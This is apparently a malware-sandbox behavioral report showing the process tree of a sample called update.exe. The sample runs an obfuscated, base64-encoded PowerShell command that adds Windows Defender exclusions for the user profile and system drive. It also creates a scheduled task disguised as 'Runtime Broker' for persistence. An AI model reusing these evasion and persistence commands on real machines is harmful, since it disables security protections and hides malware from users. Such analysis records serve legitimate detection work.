| ZeroBOX

update.exe "C:\Users\test22\AppData\Local\Temp\update.exe"
2788
- cmd.exe "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
  2948
  - powershell.exe powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
    3008
- schtasks.exe schtasks /create /sc minute /mo 1 /tn "Runtime Broker" /rl HIGHEST /tr "C:\Users\test22\AppData\Roaming\Runtime Broker\Runtime Broker"
  2076

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents